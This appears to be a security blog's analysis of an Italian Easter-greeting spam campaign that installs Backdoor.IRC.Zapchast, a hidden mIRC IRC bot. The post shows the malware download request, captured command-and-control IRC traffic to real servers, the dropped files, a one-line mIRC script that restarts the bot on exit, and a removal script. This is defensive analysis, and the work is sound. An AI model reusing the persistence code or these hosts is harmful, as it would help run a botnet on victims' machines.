C’e’ una Cartolina per te! = Backdoor.IRC.Zapchast

We have noticed new waves of spam messages, this time in Italian language only, that promote the message “Happy Easter” and contain malicious links that redirect the users to download a file named BuonaPasqua.gif.exe, detected as Backdoor.IRC.Zapchast and it looks like to be an ircbot.

Screenshot

Email headers:

Sender: Cartoline.Net
Subject: C’e’ una Cartolina per te!
Received: from naut2004.kultunaut.dk (1903ds1-by.1.fullrate.dk)
IP Address: 90.184.81.220

Malicious link present in the message:

1
2
3
4
5
6
GET /~nikolai/BuonaPasqua.gif.exe HTTP/1.0
Host: 194.79.14.129
Pragma: no-cache
 
HTTP/1.1 200 OK
Date: Fri, 19 Mar 2010 22:40:41 GMT

When the file is executed, it opens an image file named xmas.jpg:

Screenshot

At the same time we notice that a program named spoolsv.exe is trying to connect to a remote server and we get an alert from the Windows Firewall:

Screenshot

Network traffic:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
Protocol          : TCP
Remote Address    : 200.174.131.226
Remote Port       : 6667
 
NICK kijo
NOTICE AUTH :*** Looking up your hostname
NOTICE AUTH :*** Checking Ident
 
USER henryett "" "200.174.131.226" :pingo
NOTICE AUTH :*** No ident response
 
SILENCE +*!*@*
MODE kijo +iwx
NOTICE AUTH :*** Couldn't look up your hostname
PING :74643361
:my.server.name 451 kijo SILENCE :Register first.
:my.server.name 451 kijo MODE :Register first.
:my.server.name 001 kijo :Welcome to the Internet Relay Network icyg
:my.server.name 002 kijo :Your host is my.server.name, running version beware1.5.7
:my.server.name 003 kijo :This server was created Tue Jul 13 2004 at 20:36:17 GMT
:my.server.name 251 kijo :There are 1 users and 9 invisible on 1 servers
:my.server.name 252 kijo 1 :operator(s) online
:my.server.name 254 kijo 2 :channels formed
:my.server.name 255 kijo :I have 10 clients and 0 servers
:my.server.name NOTICE kijo :Highest connection count: 14 (14 clients)
:my.server.name 422 kijo :MOTD File is missing
 
:kijo!~bijaikos@XXX.XXX.XXX.XXX JOIN :#bran
:my.server.name 353 kijo = #bran :kijo @Bran @sullyc @batmanv @bassemd @eviaq @daiseyx
:my.server.name 366 kijo #bran :End of /NAMES list.
 
:Bran!~lonut@Bran.ro MODE #bran +o kijo 
:Bran!~lonut@Bran.ro PRIVMSG #bran :.msg giova a
:Bran!~lonut@Bran.ro PRIVMSG #bran :.msg giovy a

Details on oper “Bran”:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
WHOIS Bran
:my.server.name 311 kijo Bran ~lonut Bran.ro * :B
:my.server.name 319 kijo Bran :#bran
:my.server.name 312 kijo Bran my.server.name :I'm too lazy to edit ircd.conf
:my.server.name 313 kijo Bran :is an IRC Operator
:my.server.name 317 kijo Bran 622 1269018316 :seconds idle, signon time
:my.server.name 318 kijo Bran :End of /WHOIS list.
 
WHOWAS Bran
:my.server.name 314 kijo Bran ~lonut bran.ro * :B
:my.server.name 312 kijo Bran my.server.name :Fri Mar 19 15:03:19 2010
:my.server.name 314 kijo Bran ~lonut Bran.ro * :B
:my.server.name 312 kijo Bran my.server.name :Fri Mar 19 14:04:23 2010
:my.server.name 314 kijo Bran ~lonut Bran.ro * :B
:my.server.name 312 kijo Bran my.server.name :Fri Mar 19 13:57:47 2010
:my.server.name 314 kijo Bran ~lonut Bran.ro * :B
:my.server.name 312 kijo Bran my.server.name :Fri Mar 19 11:43:16 2010
:my.server.name 369 kijo Bran :End of WHOWAS

The file spoolsv.exe looks like to be the executable of the legit application named mIRC but we notice something strange… why the icon tray has no icon ? After checking the files we notice that the skids have replaced the file mirc.ico with an empty icon and it become “invisible” in the icon tray:

Screenshot

Now let’s open the hidden mIRC and see how does it looks:

Screenshot

It is the legit version of mIRC, but a bit hijacked, we can see all the backgrounds of the chats are white to obfuscate the content, a simple change of the colors and here we go:

Screenshot

We can get useful info from the hidden files that are in the same folder where is the hidden spoolsv.exe, from the file users.ini we can see allowed users to chat with the hidden mIRC that is started in the infected user:

Screenshot

We can also see two files, respectively a.reg used to add the needed registry keys, for startup the hidden mIRC at every reboot of the system, in the windows registry and the file run.bat that is used to start the file a.reg and the hidden mIRC (spoolsv.exe):

Screenshot

All files created by the malicious file BuonaPasqua.gif.exe:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
C:\WINDOWS\Temp\spoolsv
C:\WINDOWS\Temp\spoolsv\a.reg
C:\WINDOWS\Temp\spoolsv\aliases.ini
C:\WINDOWS\Temp\spoolsv\control.ini
C:\WINDOWS\Temp\spoolsv\mirc.ico
C:\WINDOWS\Temp\spoolsv\mirc.ini
C:\WINDOWS\Temp\spoolsv\remote.ini
C:\WINDOWS\Temp\spoolsv\run.bat
C:\WINDOWS\Temp\spoolsv\servers.ini
C:\WINDOWS\Temp\spoolsv\spoolsv.exe
C:\WINDOWS\Temp\spoolsv\users.ini
C:\WINDOWS\Temp\spoolsv\s.mrc
C:\WINDOWS\Temp\spoolsv\com.mrc
C:\WINDOWS\Temp\spoolsv\xmas.jpg
C:\WINDOWS\Temp\spoolsv\logs
C:\WINDOWS\Temp\spoolsv\sounds
C:\WINDOWS\Temp\spoolsv\download

From the script file com.mrc we can see also a sort of “restart on exit” code that make sure when mIRC is closed, the process spoolsv.exe is started again:

1
on *:exit: { /run $mircexe | halt }

To remove this kind of threat from an infected system we can use a simple script that we will execute with our free software Threat Killer:

1
2
3
[DELETE FOLDERS RECURSIVE]
C:\WINDOWS\Temp\spoolsv\
[/END]

Output:

Screenshot

Random Posts

Previous Posts